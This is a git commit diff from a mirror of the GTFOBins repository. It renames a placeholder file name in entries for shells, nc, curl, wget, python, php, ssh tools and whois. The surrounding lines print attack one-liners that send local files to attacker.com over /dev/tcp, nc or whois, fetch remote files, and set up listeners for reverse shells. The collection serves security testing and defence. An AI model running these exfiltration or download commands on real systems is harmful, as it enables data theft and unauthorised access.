mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 06:19:27 +01:00
Replace where_to_save with file_to_save
This commit is contained in:
parent
6a747b0920
commit
7e5bcab249
@ -13,7 +13,7 @@ functions:
|
||||
export RPORT=12345
|
||||
export LFILE=file_to_send
|
||||
bash -c 'echo -e "POST / HTTP/0.9\n\n$(cat $LFILE)" > /dev/tcp/$RHOST/$RPORT'
|
||||
- description: Send local file using a TCP connection. Run `nc -l -p 12345 > "where_to_save"` on the attacker box to collect the file.
|
||||
- description: Send local file using a TCP connection. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
|
@ -10,6 +10,6 @@ functions:
|
||||
- description: Fetch a remote file via HTTP GET request.
|
||||
code: |
|
||||
URL=http://attacker.com/file_to_get
|
||||
LFILE=where_to_save
|
||||
LFILE=file_to_save
|
||||
curl $URL -o $LFILE
|
||||
---
|
||||
|
@ -13,7 +13,7 @@ functions:
|
||||
export RPORT=12345
|
||||
export LFILE=file_to_send
|
||||
ksh -c 'echo -e "POST / HTTP/0.9\n\n$(cat $LFILE)" > /dev/tcp/$RHOST/$RPORT'
|
||||
- description: Send local file using a TCP connection. Run `nc -l -p 12345 > "where_to_save"` on the attacker box to collect the file.
|
||||
- description: Send local file using a TCP connection. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
|
@ -1,7 +1,7 @@
|
||||
---
|
||||
functions:
|
||||
upload:
|
||||
- description: Send a file to a TCP port. Run `nc -l -p 12345 > "where_to_save"` on the attacker box to collect the file.
|
||||
- description: Send a file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
RPORT=12345
|
||||
@ -11,7 +11,7 @@ functions:
|
||||
- description: Fetch remote file from a remote TCP port. Run `nc target.com 12345 < "file_to_send"` on the attacker box to send the file.
|
||||
code: |
|
||||
LPORT=12345
|
||||
LFILE=where_to_save
|
||||
LFILE=file_to_save
|
||||
nc -l -p $LPORT > "$LFILE"
|
||||
reverse-shell-interactive:
|
||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||
|
@ -38,7 +38,7 @@ functions:
|
||||
- description: Fetch a remote file via HTTP GET request.
|
||||
code: |
|
||||
export URL=http://attacker.com/file_to_get
|
||||
export LFILE=where_to_save
|
||||
export LFILE=file_to_save
|
||||
php -r '$c=file_get_contents(getenv("URL"));file_put_contents(getenv("LFILE"), $c);'
|
||||
reverse-shell-interactive:
|
||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||
|
@ -20,7 +20,7 @@ functions:
|
||||
- description: Fetch a remote file via HTTP GET request.
|
||||
code: |
|
||||
export URL=http://attacker.com/file_to_get
|
||||
export LFILE=where_to_save
|
||||
export LFILE=file_to_save
|
||||
python2 -c 'import urllib as u,os.environ as e;u.urlretrieve(e["URL"], e["LFILE"])'
|
||||
reverse-shell-interactive:
|
||||
- description: Run <code>socat file:`tty`,raw,echo=0 tcp-listen:12345</code> on the attacker box to receive the shell.
|
||||
|
@ -20,7 +20,7 @@ functions:
|
||||
- description: Fetch a remote file via HTTP GET request.
|
||||
code: |
|
||||
export URL=http://attacker.com/file_to_get
|
||||
export LFILE=where_to_save
|
||||
export LFILE=file_to_save
|
||||
python3 -c 'import urllib.request as u;from os import environ as e; u.urlretrieve (e["URL"], e["LFILE"])'
|
||||
reverse-shell-interactive:
|
||||
- description: Run <code>socat file:`tty`,raw,echo=0 tcp-listen:12345</code> on the attacker box to receive the shell.
|
||||
|
@ -24,13 +24,13 @@ functions:
|
||||
upload:
|
||||
- description: Send local file to a SSH server.
|
||||
code: |
|
||||
RPATH=user@attacker.com:~/where_to_save
|
||||
RPATH=user@attacker.com:~/file_to_save
|
||||
LPATH=file_to_send
|
||||
scp $LFILE $RPATH
|
||||
download:
|
||||
- description: Fetch a remote file from a SSH server.
|
||||
code: |
|
||||
RPATH=user@attacker.com:~/file_to_get
|
||||
LFILE=where_to_save
|
||||
LFILE=file_to_save
|
||||
scp $RPATH $LFILE
|
||||
---
|
||||
|
@ -15,11 +15,11 @@ functions:
|
||||
code: |
|
||||
RHOST=user@attacker.com
|
||||
sftp $RHOST
|
||||
put file_to_send where_to_save
|
||||
put file_to_send file_to_save
|
||||
download:
|
||||
- description: Fetch a remote file from a SSH server.
|
||||
code: |
|
||||
RHOST=user@attacker.com
|
||||
sftp $RHOST
|
||||
get file_to_get where_to_save
|
||||
get file_to_get file_to_save
|
||||
---
|
||||
|
@ -13,13 +13,13 @@ functions:
|
||||
code: |
|
||||
HOST=user@attacker.com
|
||||
RPATH=file_to_get
|
||||
LPATH=where_to_save
|
||||
LPATH=file_to_save
|
||||
ssh $HOST "cat $RPATH" > $LPATH
|
||||
upload:
|
||||
- description: Send local file to a SSH server.
|
||||
code: |
|
||||
HOST=user@attacker.com
|
||||
RPATH=where_to_save
|
||||
RPATH=file_to_save
|
||||
LPATH=file_to_send
|
||||
ssh $HOST "cat > $RPATH" < $LPATH
|
||||
file-read:
|
||||
|
@ -10,6 +10,6 @@ functions:
|
||||
- description: Fetch a remote file via HTTP GET request.
|
||||
code: |
|
||||
export URL=http://attacker.com/file_to_get
|
||||
export LFILE=where_to_save
|
||||
export LFILE=file_to_save
|
||||
wget $URL -O $LFILE
|
||||
---
|
||||
|
@ -3,13 +3,13 @@ description: |
|
||||
`whois` hangs waiting for the remote peer to close the socket.
|
||||
functions:
|
||||
upload:
|
||||
- description: Send a text file to a TCP port. Run `nc -l -p 12345 > "where_to_save"` on the attacker box to collect the file. The file has a trailing `$'\x0d\x0a'` and its length is limited by the maximum size of arguments.
|
||||
- description: Send a text file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file. The file has a trailing `$'\x0d\x0a'` and its length is limited by the maximum size of arguments.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
RPORT=12345
|
||||
LFILE=file_to_send
|
||||
whois -h $RHOST -p $RPORT "`cat $LFILE`"
|
||||
- description: Send a binary file to a TCP port. Run `nc -l -p 12345 | tr -d $'\x0d' | base64 -d > "where_to_save"` on the attacker box to collect the file. The file length is limited by the maximum size of arguments.
|
||||
- description: Send a binary file to a TCP port. Run `nc -l -p 12345 | tr -d $'\x0d' | base64 -d > "file_to_save"` on the attacker box to collect the file. The file length is limited by the maximum size of arguments.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
RPORT=12345
|
||||
@ -20,12 +20,12 @@ functions:
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
RPORT=12345
|
||||
LFILE=where_to_save
|
||||
LFILE=file_to_save
|
||||
whois -h $RHOST -p $RPORT > "$LFILE"
|
||||
- description: Fetch remote binary file from a remote TCP port. Run `base64 "file_to_send" | nc -l -p 12345` on the attacker box to send the file.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
RPORT=12345
|
||||
LFILE=where_to_save
|
||||
LFILE=file_to_save
|
||||
whois -h $RHOST -p $RPORT | base64 -d > "$LFILE"
|
||||
---
|
||||
|
Loading…
Reference in New Issue
Block a user